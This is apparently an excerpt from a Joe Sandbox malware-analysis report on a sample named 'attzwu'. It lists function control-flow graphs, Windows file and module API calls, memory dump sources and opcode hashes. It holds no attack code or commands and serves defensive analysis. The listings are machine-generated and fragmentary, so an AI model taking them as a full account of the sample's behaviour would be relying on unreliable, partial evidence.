                                                                                                                                                                                                                                                        control_flow_graph 557 73d007b9-73d007de 558 73d007e0-73d007e2 557->558 559 73d007e7-73d007e9 557->559 560 73d009b5-73d009c4 call 73cf24a6 558->560 561 73d0080a-73d0082f 559->561 562 73d007eb-73d00805 call 73cf9366 call 73cf9379 call 73cf90a7 559->562 564 73d00831-73d00834 561->564 565 73d00836-73d0083c 561->565 562->560 564->565 568 73d0085e-73d00863 564->568 569 73d0085b 565->569 570 73d0083e-73d00856 call 73cf9366 call 73cf9379 call 73cf90a7 565->570 573 73d00874-73d0087d call 73d0035e 568->573 574 73d00865-73d0086c call 73d0217b 568->574 569->568 603 73d009ac-73d009af 570->603 586 73d008b8-73d008ca 573->586 587 73d0087f-73d00881 573->587 581 73d00871 574->581 581->573 589 73d00912-73d00933 WriteFile 586->589 590 73d008cc-73d008d2 586->590 591 73d00883-73d00888 587->591 592 73d008a5-73d008ae call 73d0013e 587->592 594 73d00935-73d0093b GetLastError 589->594 595 73d0093e 589->595 597 73d00902-73d0090b call 73d003d4 590->597 598 73d008d4-73d008d7 590->598 599 73d0097c-73d0098e 591->599 600 73d0088e-73d0089b call 73d002f1 591->600 604 73d008b3-73d008b6 592->604 594->595 605 73d00941-73d0094c 595->605 610 73d00910 597->610 606 73d008f2-73d00900 call 73d005a1 598->606 607 73d008d9-73d008dc 598->607 601 73d00990-73d00993 599->601 602 73d00999-73d009a9 call 73cf9379 call 73cf9366 599->602 613 73d0089e-73d008a0 600->613 601->602 611 73d00995-73d00997 601->611 602->603 617 73d009b4 603->617 604->613 614 73d009b1 605->614 615 73d0094e-73d00953 605->615 606->604 607->599 616 73d008e2-73d008f0 call 73d004b3 607->616 610->604 611->617 613->605 614->617 621 73d00955-73d0095a 615->621 622 73d00979 615->622 616->604 617->560 626 73d00970-73d00977 call 73cf9343 621->626 627 73d0095c-73d0096e call 73cf9379 call 73cf9366 621->627 622->599 626->603 627->603
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 221ed0282f33407ca851a1bf8478a96251382768876e169347f55a786a037727
                                                                                                                                                                                                                                                        • Instruction ID: 67ba884de8aa8605ae21f92a7ba029201c0152b16aa9db9c25f7608b2e7d4fd4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 221ed0282f33407ca851a1bf8478a96251382768876e169347f55a786a037727
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E151A3B2D0030ABBEB019FA5D944FAE7BB8BF46B24F090159E445B72D0D7749640CBA2
                                                                                                                                                                                                                                                        Function 73D020E2 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 636 73d020e2-73d020fa call 73cfffa5 639 73d020fc-73d02101 call 73cf9379 636->639 640 73d0210d-73d02123 SetFilePointerEx 636->640 645 73d02107-73d0210b 639->645 642 73d02134-73d0213e 640->642 643 73d02125-73d02132 GetLastError call 73cf9343 640->643 644 73d02140-73d02155 642->644 642->645 643->645 648 73d0215a-73d0215f 644->648 645->648
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SetFilePointerEx.KERNELBASE(00000000,73CF1034,00000002,?,00000000,00000010,73CF1034,73D0BAE0,73D0BAE0,?,73D02191,?,73CF1034,00000002,00000000), ref: 73D0211B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,73D02191,?,73CF1034,00000002,00000000,?,73D00871,73CF1034,00000000,00000000,00000002,73CF1034,?,73CF1034), ref: 73D02125
                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 73D0212C
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2336955059-0
                                                                                                                                                                                                                                                        • Opcode ID: c015128ca7ce400bd07535629b8b2f8bc300bf8e98c6b5b94aa10ab9dfdfe310
                                                                                                                                                                                                                                                        • Instruction ID: 03d1dbb90637f95893672552f7127a80f227e82e3627b1f3d96dbb4bec6e53da
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c015128ca7ce400bd07535629b8b2f8bc300bf8e98c6b5b94aa10ab9dfdfe310
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60019C33611119AFCB058F99CC00F9E7B2EEB85B30B280249F915E71C0FB70E9018791
                                                                                                                                                                                                                                                        Function 73CF1270 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 673 73cf1270-73cf1280 call 73cf10e0 676 73cf1293-73cf1297 673->676 677 73cf1282-73cf128b call 73cf1930 673->677 679 73cf1299-73cf129d call 73cf7299 676->679 680 73cf12a5-73cf12c0 call 73cf12d0 676->680 681 73cf1290 677->681 684 73cf12a2 679->684 681->676 684->680
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF128B
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __vfwprintf_l_fwprintf
                                                                                                                                                                                                                                                        • String ID: QueryInterface
                                                                                                                                                                                                                                                        • API String ID: 1381976669-3068775669
                                                                                                                                                                                                                                                        • Opcode ID: 00fa8b220f5a2a1802b74ecff475bea6322d649843a05fe19980455288a6de17
                                                                                                                                                                                                                                                        • Instruction ID: 2e4127eebc535f4d9955a1f5d1fe3901bfedeb86254d1d4bca603d0bcd418ad2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00fa8b220f5a2a1802b74ecff475bea6322d649843a05fe19980455288a6de17
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FF054B6A1030AEFDB44DFA4D940F9E77B8AB44240F148158F809DB340D731EB50DB91
                                                                                                                                                                                                                                                        Function 73CF12D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 686 73cf12d0-73cf12e2 call 73cf10e0 689 73cf12f5-73cf12f9 686->689 690 73cf12e4-73cf12ed call 73cf1930 686->690 692 73cf12fb-73cf12ff call 73cf7299 689->692 693 73cf1307-73cf1322 689->693 694 73cf12f2 690->694 696 73cf1304 692->696 694->689 696->693
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF12ED
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __vfwprintf_l_fwprintf
                                                                                                                                                                                                                                                        • String ID: AddRef
                                                                                                                                                                                                                                                        • API String ID: 1381976669-2091767471
                                                                                                                                                                                                                                                        • Opcode ID: b2ec6354b2258f7528f08ea61c8a69f96538e9f1d47763273351025eb736638b
                                                                                                                                                                                                                                                        • Instruction ID: 361135e69f0bab6d60b95db134dbae8db5cecd1f8f84544696f02c3aa0a446c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2ec6354b2258f7528f08ea61c8a69f96538e9f1d47763273351025eb736638b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3F05EB6E00309EBCB00DFA4C541B9DFBB8AF44214F14C1A9E845AB341E632EB54DB91
                                                                                                                                                                                                                                                        Function 73D003D4 Relevance: 3.1, APIs: 2, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 697 73d003d4-73d0042b call 73d04fa0 700 73d00492-73d00494 697->700 701 73d00496 700->701 702 73d0042d 700->702 704 73d004a0-73d004b2 call 73cf24a6 701->704 703 73d00433-73d00435 702->703 705 73d00455-73d00477 WriteFile 703->705 706 73d00437-73d0043c 703->706 710 73d00498-73d0049e GetLastError 705->710 711 73d00479-73d00484 705->711 708 73d00445-73d00453 706->708 709 73d0043e-73d00444 706->709 708->703 708->705 709->708 710->704 711->704 713 73d00486-73d0048c 711->713 713->700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(458B1775,?,?,?,00000000,00000010,73CF1034,89000005,?,73D00910,?,73CF1034,00000010,73CF1034,73CF1034), ref: 73D0046F
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,73D00910,?,73CF1034,00000010,73CF1034,73CF1034,?,73CF1034,?,73CF7259,73CF1034), ref: 73D00498
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                                                                                                                        • Opcode ID: 81017108112da59e160f0b46a114c78cec6d35f6a0f8c0f9c6d82472700758b2
                                                                                                                                                                                                                                                        • Instruction ID: e2a886593f75e1958f2995f6daaae95625f08b049109d64aae488ba7526bdad1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81017108112da59e160f0b46a114c78cec6d35f6a0f8c0f9c6d82472700758b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87210736A002199FCB15CF69C980BD9B3F8FB48715F1004AAE54AE3241D770ED81CF25
                                                                                                                                                                                                                                                        Function 0160AE30 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 714 160ae30-160ae3f 715 160ae41-160ae4e call 1609838 714->715 716 160ae6b-160ae6f 714->716 721 160ae50 715->721 722 160ae64 715->722 717 160ae71-160ae7b 716->717 718 160ae83-160aec4 716->718 717->718 725 160aed1-160aedf 718->725 726 160aec6-160aece 718->726 773 160ae56 call 160b0c8 721->773 774 160ae56 call 160b0b8 721->774 722->716 728 160aee1-160aee6 725->728 729 160af03-160af05 725->729 726->725 727 160ae5c-160ae5e 727->722 732 160afa0-160afb7 727->732 730 160aef1 728->730 731 160aee8-160aeef call 160a814 728->731 733 160af08-160af0f 729->733 737 160aef3-160af01 730->737 731->737 745 160afb9-160b018 732->745 735 160af11-160af19 733->735 736 160af1c-160af23 733->736 735->736 740 160af30-160af39 call 160a824 736->740 741 160af25-160af2d 736->741 737->733 746 160af46-160af4b 740->746 747 160af3b-160af43 740->747 741->740 765 160b01a-160b01c 745->765 748 160af69-160af76 746->748 749 160af4d-160af54 746->749 747->746 755 160af78-160af96 748->755 756 160af99-160af9f 748->756 749->748 751 160af56-160af66 call 160a834 call 160a844 749->751 751->748 755->756 766 160b048-160b060 765->766 767 160b01e-160b046 765->767 768 160b062-160b065 766->768 769 160b068-160b093 GetModuleHandleW 766->769 767->766 768->769 770 160b095-160b09b 769->770 771 160b09c-160b0b0 769->771 770->771 773->727 774->727
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                                        • Opcode ID: 1d4cede8d612f40b883591b528745ce58d2187c8b8658499cabc4beca4a6e548
                                                                                                                                                                                                                                                        • Instruction ID: 37eb393f68154a665578ccf1480a7af1a8faf9f1e623583f1a0d90fe5ec1a8fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d4cede8d612f40b883591b528745ce58d2187c8b8658499cabc4beca4a6e548
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D78137B0A00B058FD729DF69D44075BBBF1FF88244F00892ED59A9BB90D775E946CB90
                                                                                                                                                                                                                                                        Function 01605935 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 775 1605935-160593c 776 1605944-1605a01 CreateActCtxA 775->776 778 1605a03-1605a09 776->778 779 1605a0a-1605a64 776->779 778->779 786 1605a73-1605a77 779->786 787 1605a66-1605a69 779->787 788 1605a88 786->788 789 1605a79-1605a85 786->789 787->786 791 1605a89 788->791 789->788 791->791
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 016059F1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                                                        • Opcode ID: b9ba7a5ed8c9f005bdb386834c765d2f799d2a9a48dcb2ec1aa067a27c1de496
                                                                                                                                                                                                                                                        • Instruction ID: cf266856c9e045c045b0c58d856ab35d7f90dc348294cdd1bbdcb99f25472b71
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9ba7a5ed8c9f005bdb386834c765d2f799d2a9a48dcb2ec1aa067a27c1de496
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA41CFB1C00719CFEB29DFAAC88479EBBB5FF49304F20816AD419AB250DB755986CF50
                                                                                                                                                                                                                                                        Function 01604248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 016059F1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Create
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                                                                                                                                        • Opcode ID: 4b697bf77b6b38b5e9c81dd73a2d4d1fef74d47e2548666f58a70c18a8d1e23a
                                                                                                                                                                                                                                                        • Instruction ID: 6d8e3502b682b0b0560ff714f60e5d22a85c1d032b3b46538008a3fbcb2f7665
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b697bf77b6b38b5e9c81dd73a2d4d1fef74d47e2548666f58a70c18a8d1e23a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4741F170C0071DCBDB28DFAAC884B8EBBB5FF48314F20816AD509AB251DB756946CF90
                                                                                                                                                                                                                                                        Function 0160C9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0160D2C6,?,?,?,?,?), ref: 0160D387
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                        • Opcode ID: 55fc09acb3814e8b35df0b8cc5ce18a0c5a49c2ffb0187af7facf25321743ac9
                                                                                                                                                                                                                                                        • Instruction ID: 0c9130425cb713e782cf2cfa5e0239fe83d9977df5469ae98350eb6e9418680f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55fc09acb3814e8b35df0b8cc5ce18a0c5a49c2ffb0187af7facf25321743ac9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C21D2B5900308AFDB14CFAAD984AEEBBF4FB48310F14801AE918A3350D774A954CFA4
                                                                                                                                                                                                                                                        Function 0160D2F9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0160D2C6,?,?,?,?,?), ref: 0160D387
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                                        • Opcode ID: 7c47a5fe9a4be4ec188dacc189f26b60991d93502bbed6ac3d37f397edd34e03
                                                                                                                                                                                                                                                        • Instruction ID: 2e6236c5c0c4add223a4a6dcde5fcb77cf50d1f273288e577bcfe89a6e04f39d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c47a5fe9a4be4ec188dacc189f26b60991d93502bbed6ac3d37f397edd34e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3521E5B5D00209AFDB10CFAAD885AEEBBF5FB48310F14811AE914A3350D774A951CF60
                                                                                                                                                                                                                                                        Function 73CFB5EC Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                        • Opcode ID: 3f460cd0d9a5b31e710a8d5d40aa699c2c72aaa53e8c3910997fb60a82265ac9
                                                                                                                                                                                                                                                        • Instruction ID: 6bc1ac8cbe951d76495a191b084875cc3e1a96d2eee66495483ffc4f6c77ec24
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f460cd0d9a5b31e710a8d5d40aa699c2c72aaa53e8c3910997fb60a82265ac9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3411487690420AAFCF0ACF58E940A9E7BF9EF48300F114069F808EB311D770DA11CBA5
                                                                                                                                                                                                                                                        Function 01609838 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0160AE4C), ref: 0160B086
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2700482045.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_1600000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                                        • Opcode ID: 0e675774a8916d9b2cd668c45f78a899bed0acddb84cc86753657788d824dc90
                                                                                                                                                                                                                                                        • Instruction ID: 2845f9d77486de255f24bf95de617bd9c496e13e9f7482d5b985c2042956b12b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e675774a8916d9b2cd668c45f78a899bed0acddb84cc86753657788d824dc90
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0111F0B5C003498BDB24DF9AD844B9EFBF4EB88210F10C42AD569A7350D375A949CFA5
                                                                                                                                                                                                                                                        Function 73D00E84 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,73D0125F,?,?,00000000,?,73D0125F,00000000,0000000C), ref: 73D00EA1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: ef8475fb9cf30ddac487a9d2a0a8aa68cd170b0337f37923709c757031507305
                                                                                                                                                                                                                                                        • Instruction ID: 050235bcb76bdb5cb360fe07d0ca44aea10e68f3a3c5708e2c34a0a416436340
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef8475fb9cf30ddac487a9d2a0a8aa68cd170b0337f37923709c757031507305
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D06C3214010DFBDF029F85DD06EDA3BAAFB48714F118010BA1856020C732E831AB94
                                                                                                                                                                                                                                                        Function 0144D3D8 Relevance: .1, Instructions: 75COMMON
